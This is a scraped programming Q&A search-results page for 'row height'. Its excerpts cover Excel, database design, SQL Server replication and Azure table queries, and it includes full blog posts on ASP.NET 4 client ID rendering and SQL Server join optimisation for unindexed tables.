Search Results

Search found 17528 results on 702 pages for 'row height'.

Page 243/702 | < Previous Page | 239 240 241 242 243 244 245 246 247 248 249 250  | Next Page >

  • Is it possible to have a cell in table1 "point to" a cell in table2?

    - by Lewray
    I have a hierarchical structure in a database driven software application. Each row in parentTable 'owns' a number of rows in childTable. If the childTable does not have a value set in columnA then it should return the value specified in the appropriate row of parentTable columnB. Is it possible to implement a pointer or cell reference somehow so that I do not have to copy values from parent to child. (A change in parent could result in a large number of changes in child). If this is not possible, could anyone suggest a different approach?

    Read the article

  • Netbook screen too small, Software fix?

    - by LantisGaius
    I have a netbook with a maximum screen resolution of 1024x600. I'm running a dualboot Ubuntu10.10 & Backtrack4r2, and I'm having some trouble with windows whose "height" was larger than 600px. Buttons end up below the screen, and I can't click 'Ok' or 'Cancel' or 'Apply'. When my OS was still Windows7, I didn't have any problems because I can resize all of the windows that I use. Most of windows in linux (esp. in KDE settings), the windows has a fixed height. Is there any workarounds to my problem?

    Read the article

  • Traspose matrix-style table to 3 columns in Excel

    - by polarbear2k
    I have a matrix-style table in excel where B1:Z1 are column headings and A2:A99 are row headings. I would like to convert this table to a 3 column table (column heading, row heading, cell value). It does not matter in what order the new table is. A B C D A B C A B C 1 H1 H2 H3 1 H1 R1 V1 1 H1 R1 V1 2 R1 V1 V2 V3 => 2 H1 R2 V4 or 2 H2 R1 V2 3 R2 V4 V5 V6 3 H1 R3 V7 3 H3 R1 V3 4 R3 V7 V8 V9 4 H2 R1 V2 4 H1 R2 V4 5 H2 R2 V5 5 H2 R2 V5 6 H2 R3 V8 6 H3 R2 V6 7 H3 R1 V3 7 H1 R3 V7 8 H3 R2 V6 8 H2 R3 V8 9 H3 R3 V9 9 H3 R3 V8 I've been playing around with the OFFSET function to create the whole table but I feel like a combination of TRANSPOSE and V/HLOOKUP is required. Thanks

    Read the article

  • Search Replace extended in a html file

    - by Fake4d
    i have a little question. I have a big html file and want to replace lots of things inside a lot of times. The only problem i cant solve is a replace with a variable. Example: <image src="start_files\0002.jpg" style="width:216pt; height:162"> should be transformed in <a href="start_files\0002.jpg" target="_blank"><image src="start_files\0002.jpg" style="width:216pt; height:162"></a> do you have an idea how to do it? I have a windows system with Notepad2 and Notepad++ and i could install a new tool if needed. (like Windows SED). The best solution would be a batch solution where i can add other transformations. Hope you have got good ideas! Thanks forward, Fake4d

    Read the article

  • Include new rows in autofilter range

    - by user9645
    I am working with an excel 2007 worksheet that has the "filter" applied so that each column heading has a pull-down menu for sorting. When I add new rows to the end of the table by cut-n-paste from the last row, these new rows are not included in the sorting. I can't seem to get the newly added rows to be included in the filter range. I tried un-selecting and re-selecting the "filter" button and also tried the "reapply" button. The "clear" button is always greyed out. I can't seem to find any relevant help for this online anywhere. Not sure if it matters, but the heading row and the first column are set to be "sticky" (they don't scroll with the rest of the table.)

    Read the article

  • MSSQL 2005 Snapshot Agent Uses 100% CPU

    - by matth1jd
    When setting up a new subscription to a publication (transactional replication) from 64-bit SQL Server 2005 to 64-bit SQL Server 2005 the Snapshot Agent on the publisher consumes 100% of the CPU. I am using SSMS to create the new subscription. My initial impression is that this could be from row locking occurring during the generation of the snapshot but I have read that a concurrent snapshot is generated by default in SQL Server 2005, and that row locking shouldn't be a concern. As this is a production server I would like to be able to initialize replication without bringing the box to it's knees. Any suggestions would be helpful and appreciated.

    Read the article

  • Need a solution to store images (1 billion, 1000,000,000) which users will upload to a website via php or javascript upload [on hold]

    - by wish_you_all_peace
    I need a solution to store images (1 billion) which users will upload to a website via PHP or Javascript upload (website will have 1 billion page views a month using Linux Debian distros) assuming 20 photos per user maximum (10 thumbnails of size 90px by 90px and 10 large, script resized images of having maximum width 500px or maximum height 500px depending on shape of image, meaning square, rectangle, horizontal, vertical etc). Assume this to be a LEMP-stack (Linux Nginx MySQL PHP) social-media or social-matchmaking type application whose content will be text and images. Since everyone knows storing tons of images (website users uploaded images in this case) are bad inside a single directory or NFS etc, please explain all the details about the architecture and configuration of the entire setup of storage solution, to store 1 billion images on any method you recommend (no third-party cloud storage like S3 etc. It has to be within the private data center using our own hardware and resources.). The solution has to include both the storage solution and organizing the images uploaded by users. How will we organize the users images if a single user will not have more than 20 images (10 thumbs and 10 large of having either width or height 500px)? Please consider that this has to be organized in a structural way so we can fetch a single user's images via PHP/Javascript or API programmatically through some type of user's unique identifier(s).

    Read the article

  • LinqPad with Azure Table Storage

    - by Sarang
    LinqPad as we all know has been a wonderful tool for running ad-hoc queries. With Windows Azure Table storage in picture LinqPad was no longer in picture and we shifted focus to Cloud Storage Studio only to realize the limited and strange querying capabilities of CSS. With some tweaking to Linqpad we can get the comfortable old shoe of ad-hoc queries with LinqPad in the Windows Azure Table storage. Steps: 1. Start LinqPad 2. Right Click in the query window and select “Query Properties” 3. In The Additional References add reference to Microsoft.WindowsAzure.StorageClient, System.Data.Services.Client.dll and the assembly containing the implementation of the DataServiceContext class tied to the Windows Azure table storage. 4. In the additional namespace imports import the same three namespaces mentioned above. 5. Then we need to provide following details. a. Table storage account name and shared key. b. DataServiceContext implementing class in your code. c. A LINQ query. e.x.         var storageAccountName = "myStorageAccount";  // Enter valid storage account name         var storageSharedKey = "mysharedKey"; // Enter valid storage account shared key         var uri = new System.Uri("http://table.core.windows.net/");         var storageAccountInfo = new CloudStorageAccount(new StorageCredentialsAccountKey(storageAccountName, storageSharedKey), false);         var serviceContext = new TweetPollDataServiceContext(storageAccountInfo); // Specify the DataServiceContext implementation         // The query         var query = from row in serviceContext.Table                     select row;         query.Dump(); Thanks LinqPad! Technorati Tags: LinqPad,Azure Table Storage,Linq

    Read the article

  • Cleaner HTML Markup with ASP.NET 4 Web Forms - Client IDs (VS 2010 and .NET 4.0 Series)

    - by ScottGu
    This is the sixteenth in a series of blog posts I’m doing on the upcoming VS 2010 and .NET 4 release. Today’s post is the first of a few blog posts I’ll be doing that talk about some of the important changes we’ve made to make Web Forms in ASP.NET 4 generate clean, standards-compliant, CSS-friendly markup.  Today I’ll cover the work we are doing to provide better control over the “ID” attributes rendered by server controls to the client. [In addition to blogging, I am also now using Twitter for quick updates and to share links. Follow me at: twitter.com/scottgu] Clean, Standards-Based, CSS-Friendly Markup One of the common complaints developers have often had with ASP.NET Web Forms is that when using server controls they don’t have the ability to easily generate clean, CSS-friendly output and markup.  Some of the specific complaints with previous ASP.NET releases include: Auto-generated ID attributes within HTML make it hard to write JavaScript and style with CSS Use of tables instead of semantic markup for certain controls (in particular the asp:menu control) make styling ugly Some controls render inline style properties even if no style property on the control has been set ViewState can often be bigger than ideal ASP.NET 4 provides better support for building standards-compliant pages out of the box.  The built-in <asp:> server controls with ASP.NET 4 now generate cleaner markup and support CSS styling – and help address all of the above issues.  Markup Compatibility When Upgrading Existing ASP.NET Web Forms Applications A common question people often ask when hearing about the cleaner markup coming with ASP.NET 4 is “Great - but what about my existing applications?  Will these changes/improvements break things when I upgrade?” To help ensure that we don’t break assumptions around markup and styling with existing ASP.NET Web Forms applications, we’ve enabled a configuration flag – controlRenderingCompatbilityVersion – within web.config that let’s you decide if you want to use the new cleaner markup approach that is the default with new ASP.NET 4 applications, or for compatibility reasons render the same markup that previous versions of ASP.NET used:   When the controlRenderingCompatbilityVersion flag is set to “3.5” your application and server controls will by default render output using the same markup generation used with VS 2008 and .NET 3.5.  When the controlRenderingCompatbilityVersion flag is set to “4.0” your application and server controls will strictly adhere to the XHTML 1.1 specification, have cleaner client IDs, render with semantic correctness in mind, and have extraneous inline styles removed. This flag defaults to 4.0 for all new ASP.NET Web Forms applications built using ASP.NET 4. Any previous application that is upgraded using VS 2010 will have the controlRenderingCompatbilityVersion flag automatically set to 3.5 by the upgrade wizard to ensure backwards compatibility.  You can then optionally change it (either at the application level, or scope it within the web.config file to be on a per page or directory level) if you move your pages to use CSS and take advantage of the new markup rendering. Today’s Cleaner Markup Topic: Client IDs The ability to have clean, predictable, ID attributes on rendered HTML elements is something developers have long asked for with Web Forms (ID values like “ctl00_ContentPlaceholder1_ListView1_ctrl0_Label1” are not very popular).  Having control over the ID values rendered helps make it much easier to write client-side JavaScript against the output, makes it easier to style elements using CSS, and on large pages can help reduce the overall size of the markup generated. New ClientIDMode Property on Controls ASP.NET 4 supports a new ClientIDMode property on the Control base class.  The ClientIDMode property indicates how controls should generate client ID values when they render.  The ClientIDMode property supports four possible values: AutoID—Renders the output as in .NET 3.5 (auto-generated IDs which will still render prefixes like ctrl00 for compatibility) Predictable (Default)— Trims any “ctl00” ID string and if a list/container control concatenates child ids (example: id=”ParentControl_ChildControl”) Static—Hands over full ID naming control to the developer – whatever they set as the ID of the control is what is rendered (example: id=”JustMyId”) Inherit—Tells the control to defer to the naming behavior mode of the parent container control The ClientIDMode property can be set directly on individual controls (or within container controls – in which case the controls within them will by default inherit the setting): Or it can be specified at a page or usercontrol level (using the <%@ Page %> or <%@ Control %> directives) – in which case controls within the pages/usercontrols inherit the setting (and can optionally override it): Or it can be set within the web.config file of an application – in which case pages within the application inherit the setting (and can optionally override it): This gives you the flexibility to customize/override the naming behavior however you want. Example: Using the ClientIDMode property to control the IDs of Non-List Controls Let’s take a look at how we can use the new ClientIDMode property to control the rendering of “ID” elements within a page.  To help illustrate this we can create a simple page called “SingleControlExample.aspx” that is based on a master-page called “Site.Master”, and which has a single <asp:label> control with an ID of “Message” that is contained with an <asp:content> container control called “MainContent”: Within our code-behind we’ll then add some simple code like below to dynamically populate the Label’s Text property at runtime:   If we were running this application using ASP.NET 3.5 (or had our ASP.NET 4 application configured to run using 3.5 rendering or ClientIDMode=AutoID), then the generated markup sent down to the client would look like below: This ID is unique (which is good) – but rather ugly because of the “ct100” prefix (which is bad). Markup Rendering when using ASP.NET 4 and the ClientIDMode is set to “Predictable” With ASP.NET 4, server controls by default now render their ID’s using ClientIDMode=”Predictable”.  This helps ensure that ID values are still unique and don’t conflict on a page, but at the same time it makes the IDs less verbose and more predictable.  This means that the generated markup of our <asp:label> control above will by default now look like below with ASP.NET 4: Notice that the “ct100” prefix is gone. Because the “Message” control is embedded within a “MainContent” container control, by default it’s ID will be prefixed “MainContent_Message” to avoid potential collisions with other controls elsewhere within the page. Markup Rendering when using ASP.NET 4 and the ClientIDMode is set to “Static” Sometimes you don’t want your ID values to be nested hierarchically, though, and instead just want the ID rendered to be whatever value you set it as.  To enable this you can now use ClientIDMode=static, in which case the ID rendered will be exactly the same as what you set it on the server-side on your control.  This will cause the below markup to be rendered with ASP.NET 4: This option now gives you the ability to completely control the client ID values sent down by controls. Example: Using the ClientIDMode property to control the IDs of Data-Bound List Controls Data-bound list/grid controls have historically been the hardest to use/style when it comes to working with Web Form’s automatically generated IDs.  Let’s now take a look at a scenario where we’ll customize the ID’s rendered using a ListView control with ASP.NET 4. The code snippet below is an example of a ListView control that displays the contents of a data-bound collection — in this case, airports: We can then write code like below within our code-behind to dynamically databind a list of airports to the ListView above: At runtime this will then by default generate a <ul> list of airports like below.  Note that because the <ul> and <li> elements in the ListView’s template are not server controls, no IDs are rendered in our markup: Adding Client ID’s to Each Row Item Now, let’s say that we wanted to add client-ID’s to the output so that we can programmatically access each <li> via JavaScript.  We want these ID’s to be unique, predictable, and identifiable. A first approach would be to mark each <li> element within the template as being a server control (by giving it a runat=server attribute) and by giving each one an id of “airport”: By default ASP.NET 4 will now render clean IDs like below (no ctl001-like ids are rendered):   Using the ClientIDRowSuffix Property Our template above now generates unique ID’s for each <li> element – but if we are going to access them programmatically on the client using JavaScript we might want to instead have the ID’s contain the airport code within them to make them easier to reference.  The good news is that we can easily do this by taking advantage of the new ClientIDRowSuffix property on databound controls in ASP.NET 4 to better control the ID’s of our individual row elements. To do this, we’ll set the ClientIDRowSuffix property to “Code” on our ListView control.  This tells the ListView to use the databound “Code” property from our Airport class when generating the ID: And now instead of having row suffixes like “1”, “2”, and “3”, we’ll instead have the Airport.Code value embedded within the IDs (e.g: _CLE, _CAK, _PDX, etc): You can use this ClientIDRowSuffix approach with other databound controls like the GridView as well. It is useful anytime you want to program row elements on the client – and use clean/identified IDs to easily reference them from JavaScript code. Summary ASP.NET 4 enables you to generate much cleaner HTML markup from server controls and from within your Web Forms applications.  In today’s post I covered how you can now easily control the client ID values that are rendered by server controls.  In upcoming posts I’ll cover some of the other markup improvements that are also coming with the ASP.NET 4 release. Hope this helps, Scott

    Read the article

  • SpriteBatch being drawn outside of Stage?

    - by pyko
    Currently working on my first game, though running into some problems with libgx and screen aspect ratio. What I have is a Stage which contains things like menu buttons etc, and the rest of the game is pretty much sprites being drawn with via SpriteBatch. To avoid having multiple SpriteBatches and cameras, I have re-used the ones that are created when Stage is created. stage = new Stage(WIDTH, HEIGHT, true); // keep aspect ratio batch = stage.getSpriteBatch(); camera = (OrthographicCamera) stage.getCamera(); // move camera so 'active' screen is centred stage.getCamera().translate(-stage.getGutterWidth(), -stage.getGutterHeight(), 0); Anything that is Stage/Actor related is drawn fine - all goes within the aspect ratio adjusted boundaries. The problem I'm having is anything that drawn via SpriteBatch, seems to ignore this viewport that is defined by Stage and can be visible outside of the Stage area. batch.begin(); ... sirWuffles.draw(batch); ... batch.end(); For example, in the above, if Sir Wuffles is generated outside of the defined WIDTH/HEIGHT it might still appear in the "gutters" of the screen. Tried to explain it in the below screenshot. It's an exaggerated screen ratio to make the gutters large. I've also covered most of the gutter area in the blue/cyan rectangle so they are very obvious. Does anyone know what is happening? and how to fix it? Currently, my "fix" is to use ShapeRenderer to draw rectangles that correspond to the gutters on top of the sprites...

    Read the article

  • Heaps of Trouble?

    - by Paul White NZ
    If you’re not already a regular reader of Brad Schulz’s blog, you’re missing out on some great material.  In his latest entry, he is tasked with optimizing a query run against tables that have no indexes at all.  The problem is, predictably, that performance is not very good.  The catch is that we are not allowed to create any indexes (or even new statistics) as part of our optimization efforts. In this post, I’m going to look at the problem from a slightly different angle, and present an alternative solution to the one Brad found.  Inevitably, there’s going to be some overlap between our entries, and while you don’t necessarily need to read Brad’s post before this one, I do strongly recommend that you read it at some stage; he covers some important points that I won’t cover again here. The Example We’ll use data from the AdventureWorks database, copied to temporary unindexed tables.  A script to create these structures is shown below: CREATE TABLE #Custs ( CustomerID INTEGER NOT NULL, TerritoryID INTEGER NULL, CustomerType NCHAR(1) COLLATE SQL_Latin1_General_CP1_CI_AI NOT NULL, ); GO CREATE TABLE #Prods ( ProductMainID INTEGER NOT NULL, ProductSubID INTEGER NOT NULL, ProductSubSubID INTEGER NOT NULL, Name NVARCHAR(50) COLLATE SQL_Latin1_General_CP1_CI_AI NOT NULL, ); GO CREATE TABLE #OrdHeader ( SalesOrderID INTEGER NOT NULL, OrderDate DATETIME NOT NULL, SalesOrderNumber NVARCHAR(25) COLLATE SQL_Latin1_General_CP1_CI_AI NOT NULL, CustomerID INTEGER NOT NULL, ); GO CREATE TABLE #OrdDetail ( SalesOrderID INTEGER NOT NULL, OrderQty SMALLINT NOT NULL, LineTotal NUMERIC(38,6) NOT NULL, ProductMainID INTEGER NOT NULL, ProductSubID INTEGER NOT NULL, ProductSubSubID INTEGER NOT NULL, ); GO INSERT #Custs ( CustomerID, TerritoryID, CustomerType ) SELECT C.CustomerID, C.TerritoryID, C.CustomerType FROM AdventureWorks.Sales.Customer C WITH (TABLOCK); GO INSERT #Prods ( ProductMainID, ProductSubID, ProductSubSubID, Name ) SELECT P.ProductID, P.ProductID, P.ProductID, P.Name FROM AdventureWorks.Production.Product P WITH (TABLOCK); GO INSERT #OrdHeader ( SalesOrderID, OrderDate, SalesOrderNumber, CustomerID ) SELECT H.SalesOrderID, H.OrderDate, H.SalesOrderNumber, H.CustomerID FROM AdventureWorks.Sales.SalesOrderHeader H WITH (TABLOCK); GO INSERT #OrdDetail ( SalesOrderID, OrderQty, LineTotal, ProductMainID, ProductSubID, ProductSubSubID ) SELECT D.SalesOrderID, D.OrderQty, D.LineTotal, D.ProductID, D.ProductID, D.ProductID FROM AdventureWorks.Sales.SalesOrderDetail D WITH (TABLOCK); The query itself is a simple join of the four tables: SELECT P.ProductMainID AS PID, P.Name, D.OrderQty, H.SalesOrderNumber, H.OrderDate, C.TerritoryID FROM #Prods P JOIN #OrdDetail D ON P.ProductMainID = D.ProductMainID AND P.ProductSubID = D.ProductSubID AND P.ProductSubSubID = D.ProductSubSubID JOIN #OrdHeader H ON D.SalesOrderID = H.SalesOrderID JOIN #Custs C ON H.CustomerID = C.CustomerID ORDER BY P.ProductMainID ASC OPTION (RECOMPILE, MAXDOP 1); Remember that these tables have no indexes at all, and only the single-column sampled statistics SQL Server automatically creates (assuming default settings).  The estimated query plan produced for the test query looks like this (click to enlarge): The Problem The problem here is one of cardinality estimation – the number of rows SQL Server expects to find at each step of the plan.  The lack of indexes and useful statistical information means that SQL Server does not have the information it needs to make a good estimate.  Every join in the plan shown above estimates that it will produce just a single row as output.  Brad covers the factors that lead to the low estimates in his post. In reality, the join between the #Prods and #OrdDetail tables will produce 121,317 rows.  It should not surprise you that this has rather dire consequences for the remainder of the query plan.  In particular, it makes a nonsense of the optimizer’s decision to use Nested Loops to join to the two remaining tables.  Instead of scanning the #OrdHeader and #Custs tables once (as it expected), it has to perform 121,317 full scans of each.  The query takes somewhere in the region of twenty minutes to run to completion on my development machine. A Solution At this point, you may be thinking the same thing I was: if we really are stuck with no indexes, the best we can do is to use hash joins everywhere. We can force the exclusive use of hash joins in several ways, the two most common being join and query hints.  A join hint means writing the query using the INNER HASH JOIN syntax; using a query hint involves adding OPTION (HASH JOIN) at the bottom of the query.  The difference is that using join hints also forces the order of the join, whereas the query hint gives the optimizer freedom to reorder the joins at its discretion. Adding the OPTION (HASH JOIN) hint results in this estimated plan: That produces the correct output in around seven seconds, which is quite an improvement!  As a purely practical matter, and given the rigid rules of the environment we find ourselves in, we might leave things there.  (We can improve the hashing solution a bit – I’ll come back to that later on). Faster Nested Loops It might surprise you to hear that we can beat the performance of the hash join solution shown above using nested loops joins exclusively, and without breaking the rules we have been set. The key to this part is to realize that a condition like (A = B) can be expressed as (A <= B) AND (A >= B).  Armed with this tremendous new insight, we can rewrite the join predicates like so: SELECT P.ProductMainID AS PID, P.Name, D.OrderQty, H.SalesOrderNumber, H.OrderDate, C.TerritoryID FROM #OrdDetail D JOIN #OrdHeader H ON D.SalesOrderID >= H.SalesOrderID AND D.SalesOrderID <= H.SalesOrderID JOIN #Custs C ON H.CustomerID >= C.CustomerID AND H.CustomerID <= C.CustomerID JOIN #Prods P ON P.ProductMainID >= D.ProductMainID AND P.ProductMainID <= D.ProductMainID AND P.ProductSubID = D.ProductSubID AND P.ProductSubSubID = D.ProductSubSubID ORDER BY D.ProductMainID OPTION (RECOMPILE, LOOP JOIN, MAXDOP 1, FORCE ORDER); I’ve also added LOOP JOIN and FORCE ORDER query hints to ensure that only nested loops joins are used, and that the tables are joined in the order they appear.  The new estimated execution plan is: This new query runs in under 2 seconds. Why Is It Faster? The main reason for the improvement is the appearance of the eager Index Spools, which are also known as index-on-the-fly spools.  If you read my Inside The Optimiser series you might be interested to know that the rule responsible is called JoinToIndexOnTheFly. An eager index spool consumes all rows from the table it sits above, and builds a index suitable for the join to seek on.  Taking the index spool above the #Custs table as an example, it reads all the CustomerID and TerritoryID values with a single scan of the table, and builds an index keyed on CustomerID.  The term ‘eager’ means that the spool consumes all of its input rows when it starts up.  The index is built in a work table in tempdb, has no associated statistics, and only exists until the query finishes executing. The result is that each unindexed table is only scanned once, and just for the columns necessary to build the temporary index.  From that point on, every execution of the inner side of the join is answered by a seek on the temporary index – not the base table. A second optimization is that the sort on ProductMainID (required by the ORDER BY clause) is performed early, on just the rows coming from the #OrdDetail table.  The optimizer has a good estimate for the number of rows it needs to sort at that stage – it is just the cardinality of the table itself.  The accuracy of the estimate there is important because it helps determine the memory grant given to the sort operation.  Nested loops join preserves the order of rows on its outer input, so sorting early is safe.  (Hash joins do not preserve order in this way, of course). The extra lazy spool on the #Prods branch is a further optimization that avoids executing the seek on the temporary index if the value being joined (the ‘outer reference’) hasn’t changed from the last row received on the outer input.  It takes advantage of the fact that rows are still sorted on ProductMainID, so if duplicates exist, they will arrive at the join operator one after the other. The optimizer is quite conservative about introducing index spools into a plan, because creating and dropping a temporary index is a relatively expensive operation.  It’s presence in a plan is often an indication that a useful index is missing. I want to stress that I rewrote the query in this way primarily as an educational exercise – I can’t imagine having to do something so horrible to a production system. Improving the Hash Join I promised I would return to the solution that uses hash joins.  You might be puzzled that SQL Server can create three new indexes (and perform all those nested loops iterations) faster than it can perform three hash joins.  The answer, again, is down to the poor information available to the optimizer.  Let’s look at the hash join plan again: Two of the hash joins have single-row estimates on their build inputs.  SQL Server fixes the amount of memory available for the hash table based on this cardinality estimate, so at run time the hash join very quickly runs out of memory. This results in the join spilling hash buckets to disk, and any rows from the probe input that hash to the spilled buckets also get written to disk.  The join process then continues, and may again run out of memory.  This is a recursive process, which may eventually result in SQL Server resorting to a bailout join algorithm, which is guaranteed to complete eventually, but may be very slow.  The data sizes in the example tables are not large enough to force a hash bailout, but it does result in multiple levels of hash recursion.  You can see this for yourself by tracing the Hash Warning event using the Profiler tool. The final sort in the plan also suffers from a similar problem: it receives very little memory and has to perform multiple sort passes, saving intermediate runs to disk (the Sort Warnings Profiler event can be used to confirm this).  Notice also that because hash joins don’t preserve sort order, the sort cannot be pushed down the plan toward the #OrdDetail table, as in the nested loops plan. Ok, so now we understand the problems, what can we do to fix it?  We can address the hash spilling by forcing a different order for the joins: SELECT P.ProductMainID AS PID, P.Name, D.OrderQty, H.SalesOrderNumber, H.OrderDate, C.TerritoryID FROM #Prods P JOIN #Custs C JOIN #OrdHeader H ON H.CustomerID = C.CustomerID JOIN #OrdDetail D ON D.SalesOrderID = H.SalesOrderID ON P.ProductMainID = D.ProductMainID AND P.ProductSubID = D.ProductSubID AND P.ProductSubSubID = D.ProductSubSubID ORDER BY D.ProductMainID OPTION (MAXDOP 1, HASH JOIN, FORCE ORDER); With this plan, each of the inputs to the hash joins has a good estimate, and no hash recursion occurs.  The final sort still suffers from the one-row estimate problem, and we get a single-pass sort warning as it writes rows to disk.  Even so, the query runs to completion in three or four seconds.  That’s around half the time of the previous hashing solution, but still not as fast as the nested loops trickery. Final Thoughts SQL Server’s optimizer makes cost-based decisions, so it is vital to provide it with accurate information.  We can’t really blame the performance problems highlighted here on anything other than the decision to use completely unindexed tables, and not to allow the creation of additional statistics. I should probably stress that the nested loops solution shown above is not one I would normally contemplate in the real world.  It’s there primarily for its educational and entertainment value.  I might perhaps use it to demonstrate to the sceptical that SQL Server itself is crying out for an index. Be sure to read Brad’s original post for more details.  My grateful thanks to him for granting permission to reuse some of his material. Paul White Email: [email protected] Twitter: @PaulWhiteNZ

    Read the article

  • Oracle OpenWorld Preview: Oracle WebCenter Sessions You Won’t Want to Miss

    - by Christie Flanagan
    Normal 0 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0in; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} Normal 0 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0in; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} Normal 0 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0in; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} Normal 0 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0in; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} The beginning of Oracle OpenWorld is only a few short days away. This week on the WebCenter blog, we’ll focus in on the sessions you definitely don’t want to miss while you’re in San Francisco next week.  Monday, October 1 will be a day focused on strategy.  Here are the sessions you want to add to your calendar: CON8268 - Oracle WebCenter Strategy: Engaging Your Customers. Empowering Your Business Monday, Oct 1, 10:45 AM - 11:45 AM - Moscone West – 3001 Start things off with Oracle WebCenter’s Christian Finn, Senior Director of Evangelism and Roel Stalman, VP of Product Management to learn more about the Oracle WebCenter strategy, and to understand where Oracle is taking the platform to help companies engage, customers, empower employees, and enable partners. This session will also feature Richard Backx, Business IT Architect/Consultant, for the Dutch telecom, KPN. Richard has played a key role in the roll-out of WebCenter products for KPN’s multibrand portals with a specific focus on creating the best customer journey platform for all the company’s digital channels. Business success starts with ensuring that everyone is engaged with the right people and the right information and can access what they need through the channel of their choice—web, mobile, or social. Are you giving customers, employees, and partners the best-possible experience? Come learn how you can! Dig deeper into WebCenter’s strategy for its ECM, portal, web experience management and social collaboration in the following sessions: CON8270 - Oracle WebCenter Content Strategy and Vision Monday, Oct 1, 12:15 PM - 1:15 PM - Moscone West – 3001 Oracle WebCenter Content provides a strategic content infrastructure for managing documents, images, e-mails, and rich media files. With a single repository, organizations can address any content use case, such as accounts payable, HR onboarding, document management, compliance, records management, digital asset management, or Website management. In this session, learn about future plans for how Oracle WebCenter will address new use cases as well as new integrations with Oracle Fusion Middleware and Oracle Applications, leveraging your investments by making your users more productive and error-free. CON8269 - Oracle WebCenter Sites Strategy and Vision Monday, Oct 1, 1:45 PM - 2:45 PM - Moscone West - 3009 Oracle’s Web experience management solution, Oracle WebCenter Sites, enables organizations to use the online channel to drive customer acquisition and brand loyalty. It helps marketers and business users easily create and manage contextually relevant, social, interactive online experiences across multiple channels on a global scale. In this session, learn about future plans for how Oracle WebCenter Sites will provide you with the tools, capabilities, and integrations you need in order to continue to address your customers’ evolving requirements for engaging online experiences and keep moving your business forward. CON8271 - Oracle WebCenter Portal Strategy and Vision Monday, Oct 1, 3:15 PM - 4:15 PM - Moscone West - 3001 To innovate and keep a competitive edge, organizations need to leverage the power of agile and responsive Web applications. Oracle WebCenter Portal enables you to do just that, by delivering intuitive user experiences for enterprise applications to drive innovation with composite applications and mashups. Attend this session to learn firsthand from Oracle WebCenter Portal customers like the Los Angeles Department of Water and Power, extend the value of existing enterprise applications, business processes, and content; delivers a superior business user experience; and maximizes limited IT resources. CON8272 - Oracle Social Network Strategy and Vision Monday, Oct 1, 4:45 PM - 5:45 PM - Moscone West - 3001 One key way of increasing employee productivity is by bringing people, processes, and information together—providing new social capabilities to enable business users to quickly correspond and collaborate on business activities. Oracle WebCenter provides a user engagement platform with social and collaborative technologies to empower business users to focus on their key business processes, applications, and content in the context of their role and process. Attend this session to hear how the latest social capabilities in Oracle Social Network are enabling organizations to transform themselves into social businesses.Attention WebCenter Customers: Last Day to RSVP for WebCenter Customer Appreciation Reception Oracle WebCenter partners Fishbowl Solutions, Fujitsu, Keste, Mythics, Redstone Content Solutions, TEAM Informatics, and TekStream invite Oracle WebCenter customers to a private cocktail reception at one of San Francisco's finest hotels. Please join us and fellow Oracle WebCenter customers for hors d'oeuvres and cocktails at this exclusive reception. Don't miss this opportunity to meet and talk with executives from Oracle WebCenter product management and product marketing, and premier Oracle WebCenter partners. We look forward to seeing you! RSVP today.

    Read the article

  • Point inside Oriented Bounding Box?

    - by Milo
